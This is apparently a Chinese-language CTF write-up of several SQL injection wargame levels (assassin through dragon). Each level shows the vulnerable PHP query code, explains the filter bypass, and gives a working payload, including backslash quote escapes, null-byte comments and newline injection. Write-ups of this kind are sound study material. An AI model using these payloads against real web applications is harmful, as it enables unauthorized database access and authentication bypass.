assassin
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_assassin where pw like '{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("assassin");
highlight_file(__FILE__);
用like进行模糊匹配,百度可知MYSQL语句like语法支持通配符匹配
即like ‘a%’匹配所有以a字符开头的字符串
如上,存在匹配多条记录的可能
利用burp进行fuzz,发现like ‘9%’能成功匹配出记录,但页面中显示“hello guest”,所以就可以知道,guest与admin的密码第一位相同,而guest记录在admin记录前面,所以无法匹配到admin,以此类推,直到第三位才匹配出admin记录
succubus
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/\'/',$_GET[id])) exit("HeHe");
if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("succubus");
highlight_file(__FILE__);
对单引号进行了过滤,但没有对反斜杆进行过滤,通过注入\可以吃掉一个单引号,造成单引号逃逸
payload
?id=\&pw=or 1%23
ZOMBIE_ASSASSIN
include "./config.php";
login_chk();
$db = dbconnect();
$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("zombie_assassin");
highlight_file(__FILE__);
与上面那题有异曲同工之初,同样是利用反斜杠进行单引号逃逸
addslashes转义了反斜杠,但也是用反斜杠进行的转义,合理利用这个特点即能进行绕过
payload
?id=%00&pw=%231 ro
nightmare
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~");
if(strlen($_GET[pw])>6) exit("No Hack ~_~");
$query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("nightmare");
highlight_file(__FILE__);
对长度和常规注释符号进行过滤
注释符使用;%00
逻辑运算符换用^
payload
?pw=')^0;%00
xavis
因为这次的密码是韩文,需要利用hex()函数装换为十六进制,爆破出十六进制字符串
payload
?pw=1′ or id=’admin’ and ord(substr(hex(pw),27,1))>79%23
DRAGON
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("dragon");
highlight_file(__FILE__);
寻找突破#注释的方法,发现#是单行注释,顾名思义,不能注释下一行的内容,这就是突破点
传入%0a作为换行符
payload
?pw=1'%0aand pw = '1'or id='admin'%23